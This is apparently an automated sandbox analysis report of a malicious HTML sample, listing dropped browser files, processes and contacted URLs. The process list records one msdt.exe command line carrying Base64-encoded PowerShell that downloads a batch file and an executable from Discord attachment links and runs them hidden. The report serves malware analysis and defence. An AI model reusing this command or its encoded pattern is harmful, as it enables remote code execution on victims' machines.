Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
nF0trs9UzA.html
|
HTML document, ASCII text, with very long lines
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\13726e05-4cda-4eef-820e-5588eba578fe.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\788a8dfd-dec9-4b63-953b-fbc6f9428728.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\7f1ac12e-3b21-416c-8d65-b4766f2e0084.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\82db9c85-4581-46ec-9c53-a365f8b44680.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\936fe883-afc1-428a-a348-472543343c3d.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\9c0becce-43d5-40d5-9181-9fbca7cfff27.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0e0242e6-4da8-430c-90e6-e9dbd01d1471.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0f91528a-af67-42f1-9269-0737c648201e.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\3293236a-e04e-4455-aea3-ee6a6761e2bc.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\472cf249-c5d5-4842-a549-688df528075c.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\49134c5f-cfd5-413f-aaad-ff1bdd191560.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\4c55e695-5544-4c6d-90bf-bd9276791568.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6185492b-27bd-49b9-a58e-943c826c2e12.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6bd77905-94fb-40b6-862b-e91fd1c8b72c.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6e9b753d-f7cf-4bb4-b838-e2870ab177c3.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\71ba096d-ae0e-4b31-86e1-9c83e5fce3fe.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\93111f39-a0bf-461c-9ac4-80bea82791b0.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9b569040-4716-46c0-8de7-194d440b05ba.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\df59e7ad-420c-4c98-9895-3c2b731cad00.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\852c6bac-e52c-4c65-bdcf-2d6bef49cb3b.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\27\scoped_dir6008_1601155901\Ruleset
Data
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\a2b07ece-72ed-4226-b9db-b7e40541a735.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\a8477509-16fb-48fd-bd89-28066b09638f.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\aa4f47d3-fcfb-462a-9698-e760ac2763b5.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\af3f825b-ba11-40c6-8741-e626e2ad1c78.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\b402449e-bdf1-4cee-9a4e-ca4b37a5db02.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\bd163967-f4de-4c01-ba76-cc9d2b76dc31.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\e2f335bb-46d8-40b4-b3c7-3dc91a756372.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\ebdb0507-2246-4f02-b014-518ede498973.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\ecba63ec-d24f-4837-9252-1babea5080ec.tmp
|
PGP symmetric key encrypted data - Plaintext or unencrypted data salted -
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\f801476b-c1f1-4565-b4c7-788deca3112c.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2f173533-4bef-4c06-a9ca-30c5c91e7848.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_103567953\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_103567953\_platform_specific\win_x64\widevinecdm.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_103567953\_platform_specific\win_x64\widevinecdm.dll.sig
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_103567953\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_103567953\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1514959569\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1514959569\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1514959569\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1693209245\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1693209245\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1693209245\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1693209245\safety_tips.pb
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1846426195\LICENSE
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1846426195\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1846426195\crl-set
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1846426195\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1846426195\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1914734327\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1914734327\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1914734327\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_1914734327\module_list_proto
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2054561844\Filtering Rules
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2054561844\LICENSE.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2054561844\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2054561844\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2054561844\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_pnacl_json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_2142786305\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_219198615\Recovery.crx3
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_219198615\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_219198615\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_219198615\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_696798426\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_696798426\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_696798426\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6008_696798426\ssl_error_assistant.pb
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\a0e2a87f-bf77-417d-9efe-cb150f92210e.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\2f173533-4bef-4c06-a9ca-30c5c91e7848.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\bg\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ca\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\cs\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\da\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\de\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\el\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\en\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\en_GB\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\es\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\es_419\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\et\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\fi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\fil\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\fr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\hi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\hr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\hu\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\id\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\it\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ja\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ko\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\lt\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\lv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\nb\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\nl\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\pl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\pt_BR\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\pt_PT\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ro\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ru\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\sk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\sl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\sr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\sv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\th\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\tr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\uk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\vi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\zh_CN\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\zh_TW\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\craw_background.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\craw_window.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\css\craw_window.css
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\html\craw_window.html
|
HTML document, ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\flapper.gif
|
GIF image data, version 89a, 30 x 30
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\icon_128.png
|
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\icon_16.png
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button_close.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button_hover.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button_maximize.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button_pressed.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\manifest.json
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 146 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\nF0trs9UzA.html
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,10822360021867408005,7468589743208575355,131072
--lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1960 /prefetch:8
|
||
|
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTg0Njg5ODU4ODMwMjcwNDc3Lzk4NjQyMjI3NzMxNjkzOTgxNi9jLmJhdCAtT3V0RmlsZSBDOlxXaW5kb3dzXFRhc2tzXGMuYmF0IDsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJ0M6XFdpbmRvd3NcVGFza3NcYy5iYXQnIC1XaW5kb3dTdHlsZSBIaWRkZW47IEludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vY2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRzLzk4NTM2Mzc3MjIxNjYwNjc1MC85ODUzNjQxMTE4NzEzMTU5NjgvV29yZC5leGUgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZTsgQzpcV2luZG93c1xUYXNrc1xXb3JkLmV4ZSA7'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dns.google
|
unknown
|
||
|
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
|
unknown
|
||
|
https://www.google.com/intl/en-US/chrome/blank.html
|
unknown
|
||
|
https://ogs.google.com
|
unknown
|
||
|
https://www.google.com/images/cleardot.gif
|
unknown
|
||
|
https://play.google.com
|
unknown
|
||
|
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
172.217.168.45
|
||
|
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
|
unknown
|
||
|
https://easylist.to/)
|
unknown
|
||
|
https://sandbox.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://www.google.com/images/x2.gif
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
142.250.203.110
|
||
|
https://accounts.google.com/MergeSession
|
unknown
|
||
|
http://llvm.org/):
|
unknown
|
||
|
https://creativecommons.org/compatiblelicenses
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.google.com/images/dot2.gif
|
unknown
|
||
|
https://github.com/easylist)
|
unknown
|
||
|
https://creativecommons.org/.
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry%s:
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry
